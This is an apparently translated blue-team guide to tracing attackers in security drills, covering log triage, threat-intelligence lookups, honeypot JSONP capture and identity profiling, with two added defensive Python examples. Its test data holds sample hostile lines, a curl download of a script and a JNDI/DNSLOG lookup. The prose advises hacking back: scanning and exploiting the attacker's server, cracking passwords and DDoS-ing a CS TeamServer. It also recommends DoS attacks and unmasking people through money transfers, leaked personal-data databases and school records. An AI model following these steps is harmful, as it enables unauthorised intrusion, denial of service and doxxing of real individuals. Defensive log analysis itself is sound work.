1. Overview
In attack and defense drills, source tracing generally covers: reconstructing the attack chain, tracing the attacker's virtual identity and then their real identity, identifying the members of the attacking team, and taking control of the attacker's host.
In general, the data obtained by blue team members comes from the following sources:
- Honeypot platforms
- Traffic detection platforms
- WAF, IDS, IPS
- Phishing emails
Once this data has been collected, it needs to be analyzed. The key information to focus on:
- IP addresses
- DNSLOG, C2 addresses
- Information in phishing emails
- Hacker IDs captured by honeypots
Different devices have different analysis approaches.
2. General Process of Source Tracing
Capturing the source of the attack
- Security device alerts (scanning IPs, intrusion events)
- Log traffic analysis
- Abnormal server resources (abnormal files, processes, ports, scheduled tasks, etc.)
- Phishing emails (obtaining malicious file samples)
- Honeypot system (capturing attacker behavior)
Countermeasures for source tracing
- IP geolocation technology
- ID tracking (search engines, social platforms, etc.)
- Website URLs (whois query, etc.)
- Malicious samples (extracting sample features, username IDs, etc.)
Attacker profiling
- Reconstructing the attack path
- Attack objectives
- What network proxies are used
- Attack methods (web penetration, proximity (near-source) penetration, social engineering, etc.)
- Obtaining information about the attacker's: virtual identity, real identity, contact information, organizational situation, etc.
3. WAF and Traffic Detection Devices
- Request packets -> may contain reverse-connection C2 addresses or DNSLOG addresses
- Certain websites that require registration -> may yield the attacker's registered phone number, ID card information, etc.
- IP addresses -> analyze the attack behavior path -> filter out foreign zombie (botnet) IPs
- Pay special attention to attack traffic from cloud servers such as Alibaba Cloud and Tencent Cloud
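As an added example (not code from the original post), the triage step in Python: pull the external source IPs and any callback hosts (download URLs, JNDI lookups, DNSLOG probes) out of WAF alert lines, drop internal sources, and build the worklist that the threat-intelligence lookups in the next section start from. The alert lines, address ranges and hostnames are constructed samples.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed WAF alert lines (not real data): "<timestamp> <source IP> <method> <request>".
# Source IPs are RFC 5737 documentation addresses; hostnames use reserved example TLDs.
WAF_ALERTS = """\
2024-05-01T10:01:02Z 203.0.113.5 GET /index.php?id=1%20AND%20SLEEP(5)
2024-05-01T10:01:07Z 203.0.113.5 POST /upload.php cmd=curl%20http://203.0.113.77:8080/x.sh
2024-05-01T10:02:11Z 198.51.100.23 GET /?q=${jndi:ldap://abc123.dnslog.example/a}
2024-05-01T10:03:40Z 10.0.0.8 GET /actuator/health
2024-05-01T10:04:00Z 198.51.100.23 GET /wp-login.php
"""

# Internal sources are excluded: they identify a compromised internal host, not the attacker.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
# A host the request tries to reach: malware download URL, JNDI lookup, DNSLOG probe.
CALLBACK_RE = re.compile(r"(?:https?|ldap|rmi)://([A-Za-z0-9.\-]+(?::\d+)?)", re.I)
DNSLOG_HINT = re.compile(r"dnslog|ceye|interact", re.I)

def is_internal(ip: str) -> bool:
    """True for RFC 1918, loopback and link-local sources, or for unparseable strings."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return True
    return any(addr in net for net in INTERNAL_NETS)

def triage(alert_text: str) -> dict:
    """Build the tracing worklist: hits per external source IP, the callback hosts each
    source referenced, and every DNSLOG-style host, ready for threat-intelligence lookups."""
    hits, callbacks, dnslog = Counter(), defaultdict(set), set()
    for line in alert_text.splitlines():
        parts = line.split(" ", 3)          # timestamp, source IP, method, request
        if len(parts) < 4 or is_internal(parts[1]):
            continue
        src, request = parts[1], parts[3]
        hits[src] += 1
        for host in CALLBACK_RE.findall(request):
            callbacks[src].add(host)
            if DNSLOG_HINT.search(host):
                dnslog.add(host)
    return {"hits": dict(hits),
            "callbacks": {ip: sorted(h) for ip, h in callbacks.items()},
            "dnslog": sorted(dnslog)}
```

Note that the standard library's `is_global` flag treats the RFC 5737 documentation ranges as non-global, which is why the block checks explicit internal networks instead.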
4. Threat Intelligence Analysis
After obtaining the attack IP, we can search on threat intelligence analysis platforms to obtain information such as host information, recent activities, and domain name resolution.
Useful websites:
- ThreatBook Online Intelligence Community
- Qianxin Threat Intelligence Center
- 360 Threat Intelligence Center
- VenusEye Threat Intelligence Center
4.1 Host Information
Pay special attention to port information:
- If a web application port is open -> countermeasure (inspect the port's service; masscan/nmap port scanning; look for vulnerable ports)
- CS TeamServer on port 50050 -> password-cracking scripts, DDoS attack (run the phishing trojan in batch, starting hundreds of processes to DDoS the red team's CS server)
4.2 Domain Name Resolution Records
Domain names recently resolved to the IP:
- If there are any -> continue the analysis
- If there are none, and pinging the domain name does not return the attack IP, stop the analysis
.cn domain names:
- Domain name registration information can be obtained directly
5. IP & Domain Name Tracing
In some cases attackers leave behind the IP or domain name they used, usually for downloading malicious code, reverse proxying, etc. After obtaining the IP or domain name used by the attacker, I usually trace it with the following methods:
5.1 IP
- Use threat intelligence queries to obtain the location, ISP, and resolved domain names of the IP
- Perform a full port scan of the IP to identify open ports and conduct vulnerability scanning on the service ports, attempting to take down the attacking server
- Search the attack IP on network asset mapping engines to obtain the services it provides
- Query precise geolocation data for the IP
- Launch a DoS attack on the services provided by the IP to prevent further attacks
- Most attackers use a VPS for proxy forwarding or attack directly from it. You can submit a ticket to the VPS provider describing the IP's attack behavior; the provider may block the attack traffic from the IP or ban the attacker's account.
5.2 Domain Name
- Use Whois queries to obtain email addresses and names
- Check the domain name's registration information in the Ministry of Industry and Information Technology ICP database
- Check the historical Whois information of the domain name
- Search the domain name on search engines; this may reveal the attacker's other accounts
Geolocation query:
Red team attackers may launch attacks over mobile hotspots. Geolocation queries can then be used to determine their location.
6. Honeypot Tracing
In modern browsers, the same-origin policy is the core mechanism for keeping user access secure. JSONP arose as a way to make cross-origin requests despite it.
In HTML, the src attribute of the script tag is not subject to the same-origin policy. By referencing a JavaScript file from a different domain through a script tag, a cross-origin request can be made; this is JSONP.
Honeypots use the same principle to obtain social information.
Obtaining social information through JSONP in a honeypot is relatively difficult and generally requires the following conditions to be met:
- The targeted third-party website exposes an endpoint that allows cross-origin requests and whose response contains sensitive information.
- The attacker is logged in to that third-party website and has not logged out.
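As an added illustration (not code from the original post), here is the server-side view of the two conditions above in Python: a JSONP endpoint that hands the logged-in user's profile to any page that embeds it, beside a hardened version that only attaches identity data to same-site requests. SESSIONS, ALLOWED_HOSTS and the host names are constructed placeholders.

```python
import json
import re
from urllib.parse import urlsplit

# Constructed session store (not real data): session cookie -> logged-in user's profile.
SESSIONS = {"sess-abc": {"uid": "10001", "nick": "alice", "phone": "138****0000"}}
# Hypothetical sites allowed to embed this endpoint with <script src=...>.
ALLOWED_HOSTS = {"www.example-site.test", "m.example-site.test"}
CALLBACK_RE = re.compile(r"^[A-Za-z_$][\w$.]{0,63}$")

def jsonp_leaky(query: dict, cookies: dict) -> str:
    """The pattern a honeypot page abuses: any site can load this URL in a <script> tag,
    the browser attaches the victim's cookie, and the profile lands in the attacker's callback."""
    profile = SESSIONS.get(cookies.get("sid"))
    cb = query.get("callback", "callback")          # also reflected without validation
    return f"{cb}({json.dumps(profile)})"

def jsonp_hardened(query: dict, cookies: dict, headers: dict) -> tuple:
    """Same endpoint, but identity data is only attached to same-site requests.
    Returns (status, body)."""
    cb = query.get("callback", "callback")
    if not CALLBACK_RE.match(cb):                   # block script injection via the callback
        return 400, "invalid callback"
    # Sec-Fetch-Site is set by the browser itself; an embedding page cannot forge it.
    if headers.get("Sec-Fetch-Site") == "cross-site":
        return 200, f"{cb}(null)"
    # Older browsers: fall back to a Referer allowlist; a missing Referer counts as cross-site.
    if urlsplit(headers.get("Referer", "")).hostname not in ALLOWED_HOSTS:
        return 200, f"{cb}(null)"
    profile = SESSIONS.get(cookies.get("sid"))
    return 200, f"{cb}({json.dumps(profile)})"
```

Marking the session cookie SameSite=Lax or Strict removes the second condition at the browser: the cookie is then not sent with a cross-site script load at all, so the profile is never looked up.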
After obtaining social information through honeypots, we generally start from the following aspects:
6.1 QQ Number
- If the obtained information is a QQ number, personal information such as the bank card bound to the QQ number can be obtained by making a large transfer to it. This generally yields one character of the first or last name.
- Search the QQ number or its associated email address on Baidu Tieba and other forums; this may yield Baidu Tieba account information
- Use Whois to reverse-search the QQ email address; this may yield a name or domain name
- Search the QQ number on WeChat; this may yield the attacker's WeChat account
- Add the QQ number from a secondary account and try to obtain more information through social engineering (this builds on the personal information already gathered)
6.2 Phone Number
- Transfer money to the account associated with the phone number in Alipay, try to obtain the real user's name corresponding to the phone number
- Search the phone number on WeChat, try to obtain the WeChat account
- Search the phone number on DingTalk, may obtain part of the real name and work unit
- Search the phone number on search engines, may obtain other account information
- Check the websites registered with the phone number
6.3 Tieba Account
- Use Tieba Toolbox to obtain the account's homepage and posted content
- Check the posted content, may find QQ numbers, phone numbers, email addresses, approximate age, name, etc.
6.4 Social Engineering Databases
In my opinion, social engineering databases are more used for cross-validation and are not a direct way to obtain data. Therefore, they should be compared with social engineering databases after obtaining sufficient information to confirm the real information.
6.5 Other Account Information
- Search QQ nickname, WeChat nickname, Alipay nickname, Tieba nickname, etc., may obtain information from other platforms such as Weibo, Zhihu, GitHub, and other forums and SNS communities
- Detailed examination of the account's information to extract more useful information, such as name, gender, age, address, work unit, school, etc.
6.6 School
- If school information and name are obtained, search the school on search engines to obtain the attacker's major, class, enrollment time, graduation time, student ID, etc.
- Inquire on the school's Tieba, QQ groups, etc., to obtain more personal information
- For master's and above degrees, search for papers on the China National Knowledge Infrastructure (CNKI) to confirm research directions
6.7 Email
- Check the websites registered with the email address
6.8 Hacker ID Tracing
- Search engines
- Major security response centers (SRCs)
- Asking around in the security community
7. Conclusion
The results of source tracing are generally recorded as follows:
- Name/ID:
- Attack IP:
- Geolocation:
- QQ:
- IP address company:
- IP address associated domain names:
- Email:
- Phone number:
- WeChat/Weibo/SRC/ID proof:
- Profile picture:
- Jump server:
- Associated attack events:
In the process of source tracing, the most important thing is social engineering databases, followed by the aforementioned source tracing analysis approaches.
If there are honeypot devices, try to set them to high interaction.